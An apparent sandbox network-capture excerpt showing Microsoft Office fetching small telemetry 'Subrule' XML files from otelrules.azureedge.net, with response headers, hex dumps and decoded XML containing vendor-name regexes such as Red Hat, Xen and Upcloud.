                                2024-12-03 16:51:40 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                69192.168.2.55003713.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:40 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:40 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:40 GMT
                                Content-Type: text/xml
                                Content-Length: 416
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                ETag: "0x8DC582BB5284CCE"
                                x-ms-request-id: 6176e2ed-001e-0079-20ee-4412e8000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165140Z-174f78459685m244hC1EWRgp2c000000162000000000bqau
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:40 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                Session IDSource IPSource PortDestination IPDestination Port
                                70192.168.2.55003813.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:41 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:42 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:42 GMT
                                Content-Type: text/xml
                                Content-Length: 472
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                ETag: "0x8DC582B91EAD002"
                                x-ms-request-id: 248bfb43-401e-002a-2a6a-40c62e000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165142Z-174f7845968kvnqxhC1EWRmf3g0000000szg00000000ge1a
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:42 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                71192.168.2.55003913.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:42 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:42 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:42 GMT
                                Content-Type: text/xml
                                Content-Length: 432
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                ETag: "0x8DC582BAABA2A10"
                                x-ms-request-id: 657660fb-a01e-00ab-52ac-439106000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165142Z-174f7845968cdxdrhC1EWRg0en000000167g000000004y9s
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:42 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                Session IDSource IPSource PortDestination IPDestination Port
                                72192.168.2.55004013.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:42 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:43 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:43 GMT
                                Content-Type: text/xml
                                Content-Length: 475
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                ETag: "0x8DC582BBA740822"
                                x-ms-request-id: 0bea3930-701e-0032-170d-41a540000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165143Z-174f7845968pght8hC1EWRyvxg000000098000000000u3x3
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:43 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                73192.168.2.55004213.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:43 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:43 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:43 GMT
                                Content-Type: text/xml
                                Content-Length: 474
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                ETag: "0x8DC582BA4037B0D"
                                x-ms-request-id: e8c8f6d8-301e-0052-3262-4365d6000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165143Z-174f7845968jrjrxhC1EWRmmrs00000016cg000000007mrn
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:43 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                74192.168.2.55004113.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:43 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:43 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:43 GMT
                                Content-Type: text/xml
                                Content-Length: 427
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                ETag: "0x8DC582BB464F255"
                                x-ms-request-id: 704560f5-901e-0067-514e-41b5cb000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165143Z-174f7845968xr5c2hC1EWRd0hn0000000r3g00000000741n
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:43 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                Session IDSource IPSource PortDestination IPDestination Port
                                75192.168.2.55004713.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:45 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:46 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:46 GMT
                                Content-Type: text/xml
                                Content-Length: 174
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                ETag: "0x8DC582B91D80E15"
                                x-ms-request-id: bc2c06a1-701e-005c-2dee-44bb94000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165146Z-174f7845968px8v7hC1EWR08ng00000016d000000000p43d
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:46 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                Session IDSource IPSource PortDestination IPDestination Port
                                76192.168.2.55004513.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:45 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:46 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:46 GMT
                                Content-Type: text/xml
                                Content-Length: 405
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                ETag: "0x8DC582B942B6AFF"
                                x-ms-request-id: 64c010c7-b01e-003e-2ea1-428e41000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165146Z-174f7845968zgtf6hC1EWRqd8s0000000z2g00000000s41f
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:46 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                Session IDSource IPSource PortDestination IPDestination Port
                                77192.168.2.55004313.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:45 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:46 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:46 GMT
                                Content-Type: text/xml
                                Content-Length: 472
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                ETag: "0x8DC582B984BF177"
                                x-ms-request-id: 1cfa5ca7-601e-000d-64b2-422618000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165146Z-174f7845968nxc96hC1EWRspw800000015ug00000000up0k
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:46 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                78192.168.2.55004413.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:45 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:46 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:46 GMT
                                Content-Type: text/xml
                                Content-Length: 419
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                ETag: "0x8DC582BA6CF78C8"
                                x-ms-request-id: 774b57f8-e01e-001f-60f8-441633000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165146Z-174f7845968cdxdrhC1EWRg0en0000001670000000006hv7
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:46 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                Session IDSource IPSource PortDestination IPDestination Port
                                79192.168.2.55004613.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:45 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:46 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:46 GMT
                                Content-Type: text/xml
                                Content-Length: 468
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                ETag: "0x8DC582BBA642BF4"
                                x-ms-request-id: bd78242f-a01e-003d-3eee-4498d7000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165146Z-174f7845968cpnpfhC1EWR3afc00000015w0000000008k2s
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:46 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                80192.168.2.55005013.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:48 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:48 UTC494INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:48 GMT
                                Content-Type: text/xml
                                Content-Length: 2592
                                Connection: close
